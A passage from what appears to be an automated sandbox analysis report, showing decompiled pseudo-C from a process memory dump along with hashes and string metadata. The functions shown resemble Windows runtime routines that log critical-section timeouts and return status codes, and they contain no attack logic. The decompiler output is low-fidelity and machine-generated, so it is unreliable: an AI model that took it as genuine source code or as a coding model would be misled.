                                                                                                                          										_t138 =  *((intOrPtr*)(_t151 - 0x114));
                                                                                                                          										_t119 =  *((intOrPtr*)(_t138 + 0x5c));
                                                                                                                          										 *((short*)(_t151 - 0xda)) = _t119;
                                                                                                                          										 *((short*)(_t151 - 0xdc)) = _t119;
                                                                                                                          										 *((intOrPtr*)(_t151 - 0xd8)) =  *((intOrPtr*)(_t138 + 0x60)) +  *((intOrPtr*)(_t151 - 0x110));
                                                                                                                          										if(E03699660(_t151 - 0xdc, _t151 - 0xec, 1) == 0) {
                                                                                                                          											goto L24;
                                                                                                                          										}
                                                                                                                          										_t148 = 0xc0150004;
                                                                                                                          										L23:
                                                                                                                          										 *((intOrPtr*)(_t151 - 0xd4)) = _t148;
                                                                                                                          										goto L24;
                                                                                                                          									}
                                                                                                                          									_t148 = 0xc0150005;
                                                                                                                          									goto L23;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						_t148 = 0xc0150005;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				L1:
                                                                                                                          				return E036DD130(1, _t144, _t148);
                                                                                                                          			}

















                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.564054708.0000000003660000.00000040.00000001.sdmp, Offset: 03660000, based on PE: true
                                                                                                                          • Associated: 00000017.00000002.566006399.000000000377B000.00000040.00000001.sdmp
                                                                                                                          • Associated: 00000017.00000002.566051277.000000000377F000.00000040.00000001.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: $$@
                                                                                                                          • API String ID: 0-1194432280
                                                                                                                          • Opcode ID: d4c6a7b34cce4cbfec84cef939e0403f70eaf064b61ab960434b8cc5882797f6
                                                                                                                          • Instruction ID: 819d24f26ea2d793c5a38c7c550f57b13e87ac0cf88383dbb33522d9a5cc4b88
                                                                                                                          • Opcode Fuzzy Hash: d4c6a7b34cce4cbfec84cef939e0403f70eaf064b61ab960434b8cc5882797f6
                                                                                                                          • Instruction Fuzzy Hash: D2812971D002699BDB21DF54CD45BEEB6B8AF09714F0441EAEA0DBB240D7706E85CFA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 53%
                                                                                                                          			E0371FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                                                                          				void* _t7;
                                                                                                                          				intOrPtr _t9;
                                                                                                                          				intOrPtr _t10;
                                                                                                                          				intOrPtr* _t12;
                                                                                                                          				intOrPtr* _t13;
                                                                                                                          				intOrPtr _t14;
                                                                                                                          				intOrPtr* _t15;
                                                                                                                          
                                                                                                                          				_t13 = __edx;
                                                                                                                          				_push(_a4);
                                                                                                                          				_t14 =  *[fs:0x18];
                                                                                                                          				_t15 = _t12;
                                                                                                                          				_t7 = E036CCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                                                                          				_push(_t13);
                                                                                                                          				E03715720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                                                                          				_t9 =  *_t15;
                                                                                                                          				if(_t9 == 0xffffffff) {
                                                                                                                          					_t10 = 0;
                                                                                                                          				} else {
                                                                                                                          					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                                                                          				}
                                                                                                                          				_push(_t10);
                                                                                                                          				_push(_t15);
                                                                                                                          				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                                                                          				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                                                                          				return E03715720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                                                                          			}











                                                                                                                          APIs
                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0371FDFA
                                                                                                                          Strings
                                                                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0371FE2B
                                                                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0371FE01
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.564054708.0000000003660000.00000040.00000001.sdmp, Offset: 03660000, based on PE: true
                                                                                                                          • Associated: 00000017.00000002.566006399.000000000377B000.00000040.00000001.sdmp
                                                                                                                          • Associated: 00000017.00000002.566051277.000000000377F000.00000040.00000001.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                                          • API String ID: 885266447-3903918235
                                                                                                                          • Opcode ID: 0c41c88357e8a187a890367e9f219bce57dd3f532a11704c02e336de3d33f998
                                                                                                                          • Instruction ID: 7e7dc022204a04fec3045dff252f091a8efc5e3ecc5f6aa03c60bf9c69ee705d
                                                                                                                          • Opcode Fuzzy Hash: 0c41c88357e8a187a890367e9f219bce57dd3f532a11704c02e336de3d33f998
                                                                                                                          • Instruction Fuzzy Hash: C0F0C277200641BFE7259A49DC06E23BB6AEB85B30F140318F6285A1D1DA62A87096A4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%